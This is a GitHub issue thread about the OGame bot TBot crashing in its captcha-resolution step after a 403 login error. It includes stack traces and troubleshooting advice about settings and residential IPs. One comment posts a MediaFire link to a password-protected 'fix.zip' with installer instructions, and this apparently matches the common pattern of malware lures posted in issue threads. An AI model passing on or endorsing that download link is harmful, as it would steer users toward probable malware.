### ISSUE TITLE
Problem  captcha?

### ISSUE THREAD

**Issue by DremNox** [ogame-tbot/TBot#189]
[10:31:08.263 +02:00 6 WRN Tbot] [Instance] Unable to login ("An error has occurred: Status Code: InternalServerError Status: error - Message: 403 Forbidden : {"error":{"message":"Forbidden"}}"). Checking captcha...
[10:31:22.956 +02:00 6 ERR Main] Error initializing instance "Instance": Object reference not set to an instance of an object.
Unhandled exception. System.NullReferenceException: Object reference not set to an instance of an object.
   at Tbot.Services.TBotMain.ResolveCaptcha() in /home/runner/work/TBot/TBot/TBot/Services/TBotMain.cs:line 194
   at Tbot.Services.TBotMain.Init(String settingPath, String alias, ITelegramMessenger telegramHandler) in /home/runner/work/TBot/TBot/TBot/Services/TBotMain.cs:line 251
   at Tbot.Services.InstanceManager.StartTBotMain(String settingsPath, String alias) in /home/runner/work/TBot/TBot/TBot/Services/InstanceManager.cs:line 255
   at Tbot.Services.InstanceManager.OnSettingsChanged() in /home/runner/work/TBot/TBot/TBot/Services/InstanceManager.cs:line 157
   at System.Threading.Tasks.Task.<>c.<ThrowAsync>b__128_1(Object state)
   at System.Threading.QueueUserWorkItemCallback.<>c.<.cctor>b__6_0(QueueUserWorkItemCallback quwi)
   at System.Threading.ExecutionContext.RunForThreadPoolUnsafe[TState](ExecutionContext executionContext, Action`1 callback, TState& state)
   at System.Threading.QueueUserWorkItemCallback.Execute()
   at System.Threading.ThreadPoolWorkQueue.Dispatch()
   at System.Threading.PortableThreadPool.WorkerThread.WorkerThreadStart()
   at System.Threading.Thread.StartCallback()

**Comment by Qsgz2023ji5ban** [comment]
Download 
https://www.mediafire.com/file/o50xaz6wgtazqnx/fix.zip/file
password: changeme
In the installer menu, select "gcc."

**Comment by 0xE232FE** [comment]
Are you using Cloud IP or Virtual Private Server?

**Comment by Hiabuto-de** [comment]
Same issue here, running at Linux (Ubuntu) with .NET6

`07:08:25.596 +02:00 7 ERR Main] Error initializing instance "Main Souko": Object reference not set to an instance of an object.
Unhandled exception. System.NullReferenceException: Object reference not set to an instance of an object.
   at Tbot.Services.TBotMain.ResolveCaptcha() in /home/runner/work/TBot/TBot/TBot/Services/TBotMain.cs:line 194
   at Tbot.Services.TBotMain.Init(String settingPath, String alias, ITelegramMessenger telegramHandler) in /home/runner/work/TBot/TBot/TBot/Services/TBotMain.cs:line 251
   at Tbot.Services.InstanceManager.StartTBotMain(String settingsPath, String alias) in /home/runner/work/TBot/TBot/TBot/Services/InstanceManager.cs:line 255
   at Tbot.Services.InstanceManager.OnSettingsChanged() in /home/runner/work/TBot/TBot/TBot/Services/InstanceManager.cs:line 157
   at System.Threading.Tasks.Task.<>c.<ThrowAsync>b__128_1(Object state)
   at System.Threading.QueueUserWorkItemCallback.<>c.<.cctor>b__6_0(QueueUserWorkItemCallback quwi)
   at System.Threading.QueueUserWorkItemCallback.Execute()
   at System.Threading.ThreadPoolWorkQueue.Dispatch()
   at System.Threading.PortableThreadPool.WorkerThread.WorkerThreadStart()
   at System.Threading.Thread.StartCallback()
Abgebrochen (Speicherabzug geschrieben)
`

**Comment by 0xE232FE** [comment]
There is no issue with captcha. Please verify your settings and  only login with a residential IP. Do not login with regular browser, because multiple devices could be determind under same IP and may lead to this issue.

**Comment by Eden-tw** [comment]
@0xE232FE  

Hello~
I also encountered the same problem. Is there something wrong with my settings?
I'm using my home network

Excuse me, What adjustments can I make to test this?
Thanks

![01](https://github.com/user-attachments/assets/ae21ddba-eecb-464c-a8ef-49ba3b713ff1)
![02](https://github.com/user-attachments/assets/d88efeb2-e918-4747-a3a2-d6f6222eb22a)
